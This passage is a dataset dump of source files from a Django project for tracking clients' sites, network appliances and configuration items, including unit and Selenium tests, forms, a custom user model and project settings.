cls.manufacturer = manufacturer\n cls.contract = contract\n\n # Maps the details of the tests applied to\n # Place, Appliance, and, CI list views, respectively.\n cls.list_details = {\n 
reverse('cis:manage_client_places'): ListInfo(\n 'No place was found.',\n 'formset',\n 'cis/manage_client_places.html',\n 'Place Client ',\n ),\n reverse('cis:appliance_list'): ListInfo(\n 'No appliance was found.',\n 'appliance_list',\n 'cis/appliance_list.html',\n 'SERIAL_CLIENT_',\n ),\n reverse('cis:ci_list', args=(0,)): ListInfo(\n 'No configuration item was found.',\n 'ci_list',\n 'cis/ci_list.html',\n 'HOST_',\n ),\n }\n\n def test_show_correct_items_by_client(self):\n\n # for client 'A' and client 'B'\n for k, user in self.users.items():\n self.client.force_login(user)\n\n # test Place, Appliance, and CI\n for url, test in self.list_details.items():\n test.letter = k\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, test.template_name)\n self.assertEqual(len(response.context[test.context_object_name]), 1)\n self.assertContains(response, test.contains, count=1)\n self.assertNotContains(response, test.not_contains)\n\n self.client.logout()\n\n def test_raise_exception_on_unapproved_user(self):\n user = self.users['A']\n user.client = None\n user.save()\n self.client.force_login(user)\n\n # test Place, Appliance, and CI\n for url in self.list_details.keys():\n response = self.client.get(url)\n self.assertIsNone(response.context)\n self.assertEqual(response.status_code, 403)\n\n def test_not_found(self):\n client = Client.objects.create(name=f'Client C')\n user = User.objects.create_user(f'user_c', password='faith', client=client)\n self.client.force_login(user)\n\n # test Place, Appliance, and CI\n for url, test in self.list_details.items():\n response = self.client.get(url)\n self.assertContains(response, test.message, count=1)\n self.assertEqual(len(response.context[test.context_object_name]), 0)\n self.assertNotContains(response, test.not_contains)\n\n def test_create(self):\n self.client.force_login(self.users['A'])\n\n # map urls to info that needs to be checked\n CreateInfo = namedtuple('CreateInfo', ['data', 'template_name', 'contains'])\n details = {\n 'cis:place_create': CreateInfo(\n {'name': \"New Place\"},\n 'cis/place_form.html',\n ['The place New Place was created successfully.'],\n ),\n 'cis:appliance_create': CreateInfo(\n {\n 'serial_number': 'NEW_SERIAL',\n 'manufacture': self.manufacturer,\n 'model': 'ABC123',\n 'virtual': True,\n },\n 'cis/appliance_form.html',\n ['NEW_SERIAL', 'Cisco', 'ABC123'],\n ),\n 'cis:ci_create': CreateInfo(\n {\n 'place': self.places['A'].id,\n 'appliances': (self.appliances['A'].id,),\n 'hostname': 'NEW_HOST',\n 'ip': '10.10.10.254',\n 'description': 'New Configuration Item',\n 'deployed': True,\n 'business_impact': 'high',\n 'contract': self.contract,\n },\n 'cis/ci_form.html',\n ['NEW_HOST', self.appliances['A'].serial_number],\n )\n }\n # test Place, Appliance, and CI\n for url, info in details.items():\n response = self.client.post(reverse(url), info.data, follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, info.template_name)\n for text in info.contains:\n self.assertContains(response, text, count=1)\n\n\nclass AdminViewTest(TestCase):\n fixtures = ['all.json']\n\n @classmethod\n def setUpTestData(cls):\n cls.user = User.objects.get(username='admin')\n\n def setUp(self):\n self.client.force_login(self.user)\n\n def test_mark_selected_cis_as_approved_action(self):\n data = {\n 'action': 'approve_selected_cis',\n '_selected_action': [1, 2],\n }\n response = self.client.post(reverse('admin:cis_ci_changelist'), data, 
follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'The selected CIs were approved successfully.')\n self.assertTemplateUsed(response, 'admin/change_list.html')\n\n def test_user_display_approved(self):\n response = self.client.get(reverse('admin:accounts_user_changelist'), follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTrue(self.user.is_approved)\n\n def test_client_places_links(self):\n response = self.client.get(reverse('admin:cis_client_changelist'), follow=True)\n self.assertEqual(response.status_code, 200)\n for place in Place.objects.all():\n self.assertContains(response, place.name)\n\n def test_appliance_manufacturer_links(self):\n response = self.client.get(reverse('admin:cis_appliance_changelist'), follow=True)\n self.assertEqual(response.status_code, 200)\n for manufacturer in Manufacturer.objects.exclude(appliance=None):\n self.assertContains(response, manufacturer.name)\n\n\ndef create_appliance(client, manufacturer, letter):\n return Appliance.objects.create(\n client=client,\n serial_number=f'SERIAL_CLIENT_{letter}',\n manufacturer=manufacturer,\n model='ABC123',\n virtual=True,\n )\n\n\ndef create_contract():\n return Contract.objects.create(\n name='CONTRACT',\n begin=timezone.now(),\n end=timezone.now() + timedelta(days=356),\n description='Contract Description',\n )\n\n\ndef create_ci(client, place, letter, contract):\n CI.objects.create(\n client=client,\n place=place,\n hostname=f'HOST_{letter}',\n ip='10.10.20.20',\n description=f'Configuration Item {letter}',\n deployed=True,\n contract=contract,\n )\n" }, { "alpha_fraction": 0.6340469121932983, "alphanum_fraction": 0.6340469121932983, "avg_line_length": 24.8157901763916, "blob_id": "20bb8526d1846f37bcc91019403a18a39c19d38d", "content_id": "acd6c1e65664368b190280ea4b59037b7a4ac8d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 981, "license_type": "no_license", "max_line_length": 67, "num_lines": 38, "path": "/cis/forms.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django import forms\n\nfrom .models import CI, Place, Appliance, Client\n\n\nclass UploadCIsForm(forms.Form):\n file = forms.FileField()\n\n\nclass CIForm(forms.ModelForm):\n appliances = forms.ModelMultipleChoiceField(queryset=None)\n place = forms.ModelChoiceField(queryset=None)\n\n def __init__(self, *args, **kwargs):\n self.client = kwargs.pop('client')\n super().__init__(*args, **kwargs)\n self.fields['appliances'] = forms.ModelMultipleChoiceField(\n queryset=Appliance.objects.filter(client=self.client)\n )\n self.fields['place'] = forms.ModelChoiceField(\n queryset=Place.objects.filter(client=self.client)\n )\n\n class Meta:\n model = CI\n exclude = ('client', 'status', 'pack')\n\n\nclass ApplianceForm(forms.ModelForm):\n class Meta:\n model = Appliance\n exclude = ('client',)\n\n\nclass PlaceForm(forms.ModelForm):\n class Meta:\n model = Place\n fields = ('client',)\n" }, { "alpha_fraction": 0.6436181664466858, "alphanum_fraction": 0.6503303050994873, "avg_line_length": 37.785125732421875, "blob_id": "dc5780f5eab0742fa737465e49968cce438e8afc", "content_id": "a932423ffa4694be50ed465137017df331a8514e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9386, "license_type": "no_license", "max_line_length": 98, "num_lines": 242, "path": "/cis/tests/tests_functionals.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", 
"text": "\"\"\"\nFunctional tests.\n\nRequires Selenium and geckodriver.\n\"\"\"\n\nfrom django.conf import settings\nfrom django.test import tag\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom selenium.webdriver.firefox.webdriver import WebDriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom accounts.models import User\nfrom ..models import Client, CI\nfrom ..urls import app_name\n\nLOGIN = '[email protected]'\nPASSWORD = 'UnQt5uGgjErbwkN'\nSESSION_COOKIE = settings.SESSION_COOKIE_NAME\n\n\nclass CommonTestMixin:\n \"\"\"\n Add common fixtures and methods to TestCases.\n\n A user is logged in before each test.\n\n Place the mixin early in the MRO in order to isolate\n setUpClass()/tearDownClass().\n \"\"\"\n\n fixtures = ['all.json']\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.driver = WebDriver()\n\n def setUp(self):\n # Login via Django\n user = User.objects.get(pk=1)\n self.client.force_login(user)\n cookie = self.client.cookies[SESSION_COOKIE]\n\n # Selenium will use the current domain to set the cookie\n self.driver.get(f'{self.live_server_url}/any-404')\n self.driver.add_cookie({\n 'name': SESSION_COOKIE,\n 'value': cookie.value,\n 'secure': False,\n })\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n super().tearDownClass()\n\n @staticmethod\n def _get_alert_success_text(driver: WebDriver) -> str:\n msg = WebDriverWait(driver, 2).until(\n lambda d: d.find_element(By.CSS_SELECTOR, '.alert-success')\n )\n return msg.text\n\n\n@tag('functional')\nclass LoginTest(CommonTestMixin, StaticLiveServerTestCase):\n\n def setUp(self):\n pass\n\n def test_login_unapproved_user_shows_alert(self):\n user = User.objects.get(pk=1)\n user.client = None\n user.save()\n\n self._login_user(LOGIN)\n message = self.driver.find_element(By.CSS_SELECTOR, '.alert-warning')\n self.assertEqual(\n 'Your account needs to be approved. 
Please contact you Account Manager.',\n message.text[2:]\n )\n self._logout()\n\n def test_login_approved_user_does_not_show_alert(self):\n self._login_user(LOGIN)\n with self.assertRaises(NoSuchElementException):\n self.driver.find_element(By.CSS_SELECTOR, '.alert-warning')\n home = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(home.text, 'Homepage')\n self._logout()\n\n def _login_user(self, email):\n self.driver.get(f'{self.live_server_url}/accounts/login/')\n username_input = self.driver.find_element(By.ID, 'id_login')\n username_input.send_keys(email)\n password_input = self.driver.find_element(By.ID, 'id_password')\n password_input.send_keys(PASSWORD)\n self.driver.find_element(By.XPATH, '//input[@type=\"submit\"]').click()\n\n def _logout(self):\n self.driver.find_element(By.LINK_TEXT, 'Logout').click()\n self.driver.find_element(By.XPATH, '//button[@type=\"submit\"]').click()\n\n\n@tag('functional')\nclass SiteTest(CommonTestMixin, StaticLiveServerTestCase):\n \"\"\"Test all features related to the Place model.\"\"\"\n\n def test_create_place(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/place/create/')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, 'Place')\n\n new_place_name = 'Paulista'\n name = self.driver.find_element(By.ID, 'id_name')\n name.send_keys(new_place_name)\n description = self.driver.find_element(By.ID, 'id_description')\n description.send_keys('Place description' + Keys.ENTER)\n\n msg = self._get_alert_success_text(self.driver)\n self.assertTrue(f'The place {new_place_name} was created successfully.' in msg)\n\n def test_viewing_place(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/place/1')\n new_place = self.driver.find_element(By.ID, 'id_name')\n self.assertEqual(new_place.get_attribute('value'), 'Main')\n\n def test_listing_places(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/places/')\n for i in range(2):\n place = self.driver.find_element(By.ID, f'id_place_set-{i}-name')\n self.assertTrue(place.get_attribute('value') in {'Main', 'Branch'})\n\n def test_deleting_place(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/places/')\n self.driver.find_element(By.ID, 'id_place_set-0-DELETE').click()\n self.driver.find_element(By.XPATH, '//input[@value=\"Save\"]').click()\n msg = self._get_alert_success_text(self.driver)\n self.assertTrue('The places were updated successfully.' 
in msg)\n\n\n@tag('functional')\nclass ApplianceTest(CommonTestMixin, StaticLiveServerTestCase):\n \"\"\"Test all features related to the Appliance model.\"\"\"\n\n def test_create_appliance(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/appliance/create/')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, 'Appliance')\n\n the_serial_number = 'DEF456'\n serial = self.driver.find_element(By.ID, 'id_serial_number')\n serial.send_keys(the_serial_number)\n\n manufacturer = self.driver.find_element(By.ID, 'id_manufacturer')\n manufacturer_select = Select(manufacturer)\n manufacturer_select.select_by_index(1)\n\n model = self.driver.find_element(By.ID, 'id_model')\n model.send_keys('C9000')\n\n serial = self.driver.find_element(By.ID, 'id_serial_number')\n self.assertEqual(serial.get_attribute('value'), the_serial_number)\n\n def test_viewing_appliance(self):\n _id = 3\n self.driver.get(f'{self.live_server_url}/{app_name}/appliance/{_id}')\n serial = self.driver.find_element(By.ID, 'id_serial_number')\n self.assertEqual(serial.get_attribute('value'), f'SERIAL{_id}')\n\n def test_listing_appliances(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/appliances/')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, 'Appliances')\n\n serials = self.driver.find_elements(By.CSS_SELECTOR, 'td>a')\n for i, serial in enumerate(serials):\n self.assertEqual(serial.text, f'SERIAL{i + 1}')\n\n def test_view_appliance_from_listing(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/appliances/')\n serial_origin = self.driver.find_element(By.CSS_SELECTOR, 'td>a')\n serial = serial_origin.text\n serial_origin.click()\n serial_target = self.driver.find_element(By.ID, 'id_serial_number')\n self.assertEqual(serial, serial_target.get_attribute('value'))\n\n\n@tag('functional')\nclass CITest(CommonTestMixin, StaticLiveServerTestCase):\n \"\"\"Test all features related to the CI model.\"\"\"\n\n def test_create_ci(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/ci/create/')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, 'Configuration Item')\n\n self.driver.find_element(By.ID, 'id_hostname').send_keys('NEW_HOST')\n place_select = Select(self.driver.find_element(By.ID, 'id_place'))\n place_select.select_by_value('1')\n self.driver.find_element(By.ID, 'id_ip').send_keys('10.10.20.20')\n contract_select = Select(self.driver.find_element(By.ID, 'id_contract'))\n contract_select.select_by_index(1)\n self.driver.find_element(By.ID, 'id_description').send_keys('Some text.')\n appliances_select = Select(self.driver.find_element(By.ID, 'id_appliances'))\n appliances_select.select_by_value('1')\n appliances_select.select_by_value('2')\n self.driver.find_element(By.ID, 'id_username').send_keys('admin')\n self.driver.find_element(By.ID, 'id_password').send_keys('123')\n self.driver.find_element(By.ID, 'id_enable_password').send_keys('enable123' + Keys.RETURN)\n\n msg = self._get_alert_success_text(self.driver)\n self.assertTrue('success' in msg)\n\n def test_viewing_ci(self):\n ci = CI.objects.get(pk=3)\n self.driver.get(f'{self.live_server_url}/{app_name}/ci/3')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, str(ci))\n\n def test_listing_cis(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/cis/0/')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, 'Configuration Items Created')\n\n cis = 
self.driver.find_elements(By.CSS_SELECTOR, 'td>a')\n for hostname in cis:\n hostnames = ('CORE', 'FLW2', 'FLW3')\n self.assertTrue(hostname.text in hostnames)\n\n def test_view_ci_from_listing(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/cis/0/')\n ci_origin = self.driver.find_element(By.CSS_SELECTOR, 'td>a')\n ci_hostname_origin = ci_origin.text\n ci_origin.click()\n ci_hostname_target = self.driver.find_element(By.ID, 'hostname')\n self.assertEqual(ci_hostname_target.text, ci_hostname_origin)\n" }, { "alpha_fraction": 0.7153075933456421, "alphanum_fraction": 0.7181687951087952, "avg_line_length": 30.772727966308594, "blob_id": "8796fda7e000e6a7392253fb4d27530068c8ff34", "content_id": "05e9fc3d41929136b1ba2a092147265faed7c3fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "no_license", "max_line_length": 102, "num_lines": 22, "path": "/accounts/models.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import AbstractUser, UserManager\n\n\nclass UserClientManager(UserManager):\n def get_queryset(self):\n return super().get_queryset().select_related('client')\n\n\nclass User(AbstractUser):\n client = models.ForeignKey('cis.Client', on_delete=models.CASCADE, blank=True, null=True)\n\n # modify the user manager's initial QuerySet to join the Client\n # https://docs.djangoproject.com/en/3.1/topics/db/managers/#modifying-a-manager-s-initial-queryset\n objects = UserClientManager()\n\n def __str__(self):\n return self.email\n\n @property\n def is_approved(self):\n return bool(self.client) or self.is_superuser\n" }, { "alpha_fraction": 0.6798714995384216, "alphanum_fraction": 0.680942177772522, "avg_line_length": 31.20689582824707, "blob_id": "b62710773f1bb0869b7b0ca944c1956a3dfdaaf2", "content_id": "92d325c61f2ef464c3e4ef731789ef7f17417312", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 934, "license_type": "no_license", "max_line_length": 76, "num_lines": 29, "path": "/accounts/tests.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom django.db.utils import IntegrityError\n\nfrom .models import User\nfrom cis.models import Client\n\n\nclass UserTest(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.user = User.objects.create_user(username='new', email='[email protected]')\n\n def test_is_approved_returns_true_when_user_has_client(self):\n client = Client.objects.create(name='New Client')\n self.user.client = client\n self.assertTrue(self.user.is_approved)\n\n def test_is_approved_returns_false_when_user_has_no_client(self):\n self.user.client = None\n self.assertFalse(self.user.is_approved)\n\n def test_user_as_string_returns_email(self):\n self.assertEqual(str(self.user), self.user.email)\n\n def test_duplicate_name_raises_exception(self):\n with self.assertRaises(IntegrityError):\n self.user.pk = None\n self.user.save()\n self.user.pk = 1\n" }, { "alpha_fraction": 0.6795735955238342, "alphanum_fraction": 0.6892929673194885, "avg_line_length": 26.14468002319336, "blob_id": "47e68ec1f904bb39f8f8903b6a5be9a682a992c8", "content_id": "e17d416d7621e6f95a0202eb60f60b021dfcac43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6379, "license_type": "no_license", "max_line_length": 106, "num_lines": 235, "path": 
"/internalize/settings.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "\"\"\"\nDjango settings for internalize project.\n\nGenerated by 'django-admin startproject' using Django 3.1.5.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/3.2/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/3.2/ref/settings/\n\"\"\"\n\nimport django_heroku\nimport os\nfrom pathlib import Path\nfrom django.contrib.messages import constants as messages\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', '_zkf47_u&6yyr+b5wq_q0^_@+)%1nrl^vf=)+m4ut@%(^w_jco')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = int(os.environ.get('DEBUG', 1))\n\n# 'ALLOWED_HOSTS' should be a single string of hosts with a space between each.\n# For example: 'ALLOWED_HOSTS=127.0.0.1 [::1]'\nALLOWED_HOSTS = os.environ.get('ALLOWED_HOSTS', '127.0.0.1 [::1]').split(' ')\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n\n # 3rd party\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'crispy_forms',\n 'debug_toolbar',\n 'django_extensions',\n\n # Local\n 'accounts',\n 'cis',\n]\n\nMIDDLEWARE = [\n # Simplified static file serving.\n # https://warehouse.python.org/project/whitenoise/\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n]\n\nROOT_URLCONF = 'internalize.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [BASE_DIR / 'templates'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'internalize.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/3.2/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": os.environ.get(\"SQL_ENGINE\", \"django.db.backends.sqlite3\"),\n \"NAME\": os.environ.get(\"SQL_DATABASE\", BASE_DIR / \"db.sqlite3\"),\n \"USER\": os.environ.get(\"SQL_USER\", \"user\"),\n \"PASSWORD\": os.environ.get(\"SQL_PASSWORD\", \"password\"),\n \"HOST\": os.environ.get(\"SQL_HOST\", \"localhost\"),\n \"PORT\": os.environ.get(\"SQL_PORT\", \"5432\"),\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 
'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nAUTH_USER_MODEL = 'accounts.User'\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.2/topics/i18n/\n\nLANGUAGE_CODE = 'pt-br'\n\nTIME_ZONE = 'America/Sao_Paulo'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.2/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATIC_ROOT = BASE_DIR / 'staticfiles'\n\n# Extra places for collectstatic to find static files.\nSTATICFILES_DIRS = (BASE_DIR / 'static',)\n\n\n# Simplified static file serving.\n# https://warehouse.python.org/project/whitenoise/\nSTATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'\n\n\n# Default primary key field type\n# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field\n\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\n\n# allauth\n\nif DEBUG:\n EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n \"django.contrib.auth.backends.ModelBackend\",\n\n # `allauth` specific authentication methods, such as login by e-mail\n \"allauth.account.auth_backends.AuthenticationBackend\",\n)\n\nSITE_ID = 1\n\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_USERNAME_REQUIRED = False\nACCOUNT_SIGNUP_PASSWORD_ENTER_TWICE = False\nACCOUNT_SESSION_REMEMBER = True\nACCOUNT_AUTHENTICATION_METHOD = 'email'\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_CONFIRM_EMAIL_ON_GET = True\n\nLOGIN_REDIRECT_URL = 'homepage'\n\nACCOUNT_LOGOUT_REDIRECT_URL = 'homepage'\n\n\nMESSAGE_TAGS = {\n messages.DEBUG: 'alert-info',\n messages.INFO: 'alert-info',\n messages.SUCCESS: 'alert-success',\n messages.WARNING: 'alert-warning',\n messages.ERROR: 'alert-danger',\n}\n\n\n# Debug Toolbar\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#configuring-internal-ips\nINTERNAL_IPS = ['127.0.0.1']\n\n\nCRISPY_TEMPLATE_PACK = 'bootstrap4'\n\n\n# Sets a strict policy to disable many potentially privacy-invading and annoying features for all scripts.\n# https://pypi.org/project/django-permissions-policy/\n\nPERMISSIONS_POLICY = {\n \"accelerometer\": [],\n \"ambient-light-sensor\": [],\n \"autoplay\": [],\n \"camera\": [],\n \"document-domain\": [],\n \"encrypted-media\": [],\n \"fullscreen\": [],\n \"geolocation\": [],\n \"gyroscope\": [],\n \"interest-cohort\": [],\n \"magnetometer\": [],\n \"microphone\": [],\n \"midi\": [],\n \"payment\": [],\n \"usb\": [],\n}\n\n\n# Activate Django-Heroku.\ndjango_heroku.settings(locals())\n" }, { "alpha_fraction": 0.6313775777816772, "alphanum_fraction": 0.6424927115440369, "avg_line_length": 30.9069766998291, "blob_id": "3f5428938561df93bfbe5f4776a03926a80930a9", "content_id": "568204ec71b9db7da05760b02fdc19166200aedd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5488, "license_type": "no_license", "max_line_length": 82, "num_lines": 172, "path": "/cis/tests/tests_models.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.shortcuts import reverse\nfrom django.test import TestCase\nfrom django.db.utils import IntegrityError\n\nfrom accounts.models import User\nfrom ..models 
import Client, Place, Manufacturer, Contract, Appliance, CI, CIPack\n\nCLIENT_NAME = 'Client A'\nPLACE_NAME = 'Main'\nMANUFACTURER = 'Cisco Systems'\nCONTRACT_NAME = 'BR-001'\n\n\nclass FixtureMixin:\n \"\"\"Add the same fixture to all TestCase\"\"\"\n\n fixtures = ['all.json']\n\n\nclass ClientTest(FixtureMixin, TestCase):\n\n def test_client_as_string_returns_name(self):\n client = Client.objects.get(pk=1)\n self.assertEqual(str(client), CLIENT_NAME)\n\n def test_duplicate_name_raises_exception(self):\n with self.assertRaises(IntegrityError):\n Client.objects.create(name=CLIENT_NAME)\n\n\nclass PlaceTest(FixtureMixin, TestCase):\n\n def test_as_string_returns_client_plus_place_name(self):\n place = Place.objects.get(pk=1)\n self.assertEqual(str(place), f'{CLIENT_NAME} | {PLACE_NAME}')\n\n def test_duplicate_name_by_client_raises_exception(self):\n client = Client.objects.get(pk=1)\n with self.assertRaises(IntegrityError):\n Place.objects.create(name=PLACE_NAME, client=client)\n\n def test_duplicate_name_different_client_is_ok(self):\n client = Client.objects.create(name='Different Client')\n self.assertIsNotNone(Place.objects.create(name=PLACE_NAME, client=client))\n\n def test_absolute_url_returns_correct_url(self):\n place = Place.objects.get(pk=1)\n self.assertEqual(\n place.get_absolute_url(),\n reverse('cis:place_update', args=[place.pk])\n )\n\n\nclass ManufacturerTest(FixtureMixin, TestCase):\n\n def test_as_string_returns_name(self):\n manufacturer = Manufacturer.objects.get(pk=1)\n self.assertEqual(str(manufacturer), MANUFACTURER)\n\n def test_duplicate_name_raises_exception(self):\n with self.assertRaises(IntegrityError):\n Manufacturer.objects.create(name=MANUFACTURER)\n\n\nclass ContractTest(FixtureMixin, TestCase):\n\n def test_as_string_returns_name(self):\n contract = Contract.objects.get(pk=1)\n self.assertEqual(str(contract), CONTRACT_NAME)\n\n\nclass ApplianceTest(FixtureMixin, TestCase):\n\n def test_as_string_returns_full_name(self):\n appliance = Appliance.objects.get(pk=1)\n self.assertEqual(\n str(appliance),\n f'{MANUFACTURER} | {appliance.model} | {appliance.serial_number}'\n )\n\n def test_duplicate_serial_number_raises_exception(self):\n appliance = Appliance.objects.get(pk=1)\n appliance.pk = None\n with self.assertRaises(IntegrityError):\n appliance.save()\n\n def test_absolute_url_returns_correct_url(self):\n appliance = Appliance.objects.get(pk=1)\n self.assertEqual(\n appliance.get_absolute_url(),\n reverse('cis:appliance_update', args=[appliance.pk])\n )\n\n\nclass CITest(FixtureMixin, TestCase):\n\n def test_as_string_returns_full_name(self):\n ci = CI.objects.get(pk=1)\n self.assertEqual(\n str(ci),\n f'{CLIENT_NAME} | {PLACE_NAME} | {ci.hostname} | {ci.ip}'\n )\n\n def test_unique_constraint_raises_exception(self):\n ci = CI.objects.get(pk=1)\n ci.pk = None\n ci.credential_id = None\n with self.assertRaises(IntegrityError):\n ci.save()\n\n def test_duplicate_hostname_with_different_client_is_ok(self):\n new_client = Client.objects.create(name='Different Client')\n ci = CI.objects.get(pk=1)\n ci.pk = None\n ci.credential_id = None\n ci.client = new_client\n ci.save()\n self.assertIsNotNone(ci.pk)\n\n def test_absolute_url_returns_correct_url(self):\n ci = CI.objects.get(pk=1)\n self.assertEqual(\n ci.get_absolute_url(),\n reverse('cis:ci_detail', args=[ci.pk])\n )\n\n\nclass CIPackTest(FixtureMixin, TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.admin = User.objects.get(pk=2)\n cls.user = User.objects.get(pk=1)\n cls.pack = 
CIPack.objects.get(pk=1)\n cls.cis = CI.objects.all()\n\n def test_as_string_returns_responsible_plus_local_data(self):\n self.assertEqual(\n str(self.pack),\n f\"{self.user} 2021-04-20 09:25:38\" # UTC-3\n )\n\n def test_percentage_of_cis_approved(self):\n # Approve 0 of 3 CIs\n self.assertEqual(self.pack.percentage_of_cis_approved, 0)\n\n # Approve 1 of 3 CIs\n self.pack.ci_set.filter(pk__in=(1,)).update(status=2)\n self.assertEqual(self.pack.percentage_of_cis_approved, 33)\n\n # Approve 2 of 3 CIs\n self.pack.ci_set.filter(pk__in=(1, 2)).update(status=2)\n self.assertEqual(self.pack.percentage_of_cis_approved, 67)\n\n # Approve 3 of 3 CIs\n self.pack.ci_set.filter(pk__in=(1, 2, 3)).update(status=2)\n self.assertEqual(self.pack.percentage_of_cis_approved, 100)\n\n def test_approved_by_returns_the_right_superuser(self):\n self.pack.approved_by = self.admin\n self.pack.save()\n self.assertEqual(self.pack.approved_by, self.admin)\n\n def test_send_cis_to_production(self):\n ci_pks = (ci.pk for ci in self.cis)\n self.pack.send_to_production(ci_pks)\n\n for ci in self.pack.ci_set.all():\n self.assertEqual(ci.status, 1)\n\n def test_len_returns_count_of_ci_set(self):\n self.assertEqual(len(self.pack), 3)\n" }, { "alpha_fraction": 0.5570608377456665, "alphanum_fraction": 0.5882893204689026, "avg_line_length": 32.5, "blob_id": "06a4ebfc281765016667bf7bc3622e6a8a98d088", "content_id": "eb5ddf49ca5670415aa681ec69f1568927163228", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4355, "license_type": "no_license", "max_line_length": 74, 